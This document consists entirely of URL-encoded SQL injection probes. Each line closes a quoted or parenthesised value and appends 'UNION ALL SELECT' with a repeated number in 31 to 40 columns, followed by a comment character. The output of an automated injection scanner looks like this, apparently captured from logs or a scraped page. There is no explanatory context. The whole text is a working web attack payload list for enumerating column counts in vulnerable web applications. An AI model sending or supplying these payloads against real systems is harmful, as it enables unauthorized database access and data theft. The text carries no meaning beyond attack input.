-3627%22%20UNION%20ALL%20SELECT%206305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%23 -3560%22%20UNION%20ALL%20SELECT%209980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%2C9980%23 -8751%22%20UNION%20ALL%20SELECT%206170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%2C6170%23 -1701%22%20UNION%20ALL%20SELECT%206316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%2C6316%23 -1248%22%20UNION%20ALL%20SELECT%201855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%23 -4370%22%20UNION%20ALL%20SELECT%208758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%23 -8660%22%20UNION%20ALL%20SELECT%201036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%23 -3423%22%20UNION%20ALL%20SELECT%204998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%2C4998%23 -2957%22%20UNION%20ALL%20SELECT%202504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%2C2504%23 -6230%27%29%20UNION%20ALL%20SELECT%208832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%2C8832%23 -8369%27%29%20UNION%20ALL%20SELECT%205114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%23 -7332%27%29%20UNION%20ALL%20SELECT%207088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%23 -1156%27%29%20UNION%20ALL%20SELECT%202266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%2C2266%23 -5532%27%29%20UNION%20ALL%20SELECT%203205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205%23 -4213%27%29%20UNION%20ALL%20SELECT%205135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%23 -6253%27%29%20UNION%20ALL%20SELECT%206368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%23 -6257%27%29%20UNION%20ALL%20SELECT%201979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%23 -1980%27%29%20UNION%20ALL%20SELECT%208715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%23 -9818%27%29%20UNION%20ALL%20SELECT%204337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%23 -7092%27%29%29%20UNION%20ALL%20SELECT%205226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%2C5226%23 -9671%27%29%29%20UNION%20ALL%20SELECT%202586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%23 -9339%27%29%29%20UNION%20ALL%20SELECT%204342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%23 -5335%27%29%29%20UNION%20ALL%20SELECT%205824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%2C5824%23 -9440%27%29%29%20UNION%20ALL%20SELECT%203836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%2C3836%23 -8078%27%29%29%20UNION%20ALL%20SELECT%205579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%23 -4337%27%29%29%20UNION%20ALL%20SELECT%206143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%23 -4128%27%29%29%20UNION%20ALL%20SELECT%206716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%2C6716%23 -9924%27%29%29%20UNION%20ALL%20SELECT%205507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%2C5507%23 -8489%27%29%29%20UNION%20ALL%20SELECT%207847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%23 -7579%27%29%29%29%20UNION%20ALL%20SELECT%204521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%23 -1162%27%29%29%29%20UNION%20ALL%20SELECT%208439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%23 -2619%27%29%29%29%20UNION%20ALL%20SELECT%204202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%23 -4752%27%29%29%29%20UNION%20ALL%20SELECT%202160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%23 -5239%27%29%29%29%20UNION%20ALL%20SELECT%205211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%23 -3421%27%29%29%29%20UNION%20ALL%20SELECT%207854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%2C7854%23 -4447%27%29%29%29%20UNION%20ALL%20SELECT%205947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%23 -5819%27%29%29%29%20UNION%20ALL%20SELECT%205834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%2C5834%23 -8074%27%29%29%29%20UNION%20ALL%20SELECT%201583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%23 -6844%27%29%29%29%20UNION%20ALL%20SELECT%205125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%2C5125%23 -5427%27%20UNION%20ALL%20SELECT%206608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%2C6608%23 -5818%27%20UNION%20ALL%20SELECT%202972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%2C2972%23 -4733%27%20UNION%20ALL%20SELECT%206723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%23 -5835%27%20UNION%20ALL%20SELECT%209610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%2C9610%23 -3593%27%20UNION%20ALL%20SELECT%208018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%23 -9198%27%20UNION%20ALL%20SELECT%205586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%23 -1368%27%20UNION%20ALL%20SELECT%208148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%23 -1109%27%20UNION%20ALL%20SELECT%206773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%2C6773%23 -4871%27%20UNION%20ALL%20SELECT%206946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%2C6946%23 -4398%27%20UNION%20ALL%20SELECT%201899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%2C1899%23 -1415%27%29%20UNION%20ALL%20SELECT%208065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%2C8065%23 -2220%27%29%20UNION%20ALL%20SELECT%204389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%2C4389%23 -2070%27%29%20UNION%20ALL%20SELECT%204007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%2C4007%23 -5462%27%29%20UNION%20ALL%20SELECT%204701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%23 -2930%27%29%20UNION%20ALL%20SELECT%207414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%23 -8126%27%29%20UNION%20ALL%20SELECT%207794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%2C7794%23 -5838%27%29%20UNION%20ALL%20SELECT%202388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%23 -1384%27%29%20UNION%20ALL%20SELECT%206190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%23 -7670%27%29%20UNION%20ALL%20SELECT%206666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%2C6666%23 -2913%27%29%20UNION%20ALL%20SELECT%209425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%2C9425%23 -3037%27%29%29%20UNION%20ALL%20SELECT%205134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%2C5134%23 -6812%27%29%29%20UNION%20ALL%20SELECT%206293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%2C6293%23 -1558%27%29%29%20UNION%20ALL%20SELECT%208240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%23 -1493%27%29%29%20UNION%20ALL%20SELECT%209101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%2C9101%23 -2369%27%29%29%20UNION%20ALL%20SELECT%204213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%2C4213%23 -8929%27%29%29%20UNION%20ALL%20SELECT%203729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%23 -2049%27%29%29%20UNION%20ALL%20SELECT%208568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%23 -5717%27%29%29%20UNION%20ALL%20SELECT%204327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%23 -8491%27%29%29%20UNION%20ALL%20SELECT%205121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%23 -2980%27%29%29%20UNION%20ALL%20SELECT%206027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%2C6027%23 -4556%27%29%29%29%20UNION%20ALL%20SELECT%201891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%23 -1370%27%29%29%29%20UNION%20ALL%20SELECT%208569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%23 -9556%27%29%29%29%20UNION%20ALL%20SELECT%205480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%2C5480%23 -4470%27%29%29%29%20UNION%20ALL%20SELECT%204753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%23 -3687%27%29%29%29%20UNION%20ALL%20SELECT%202141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%23 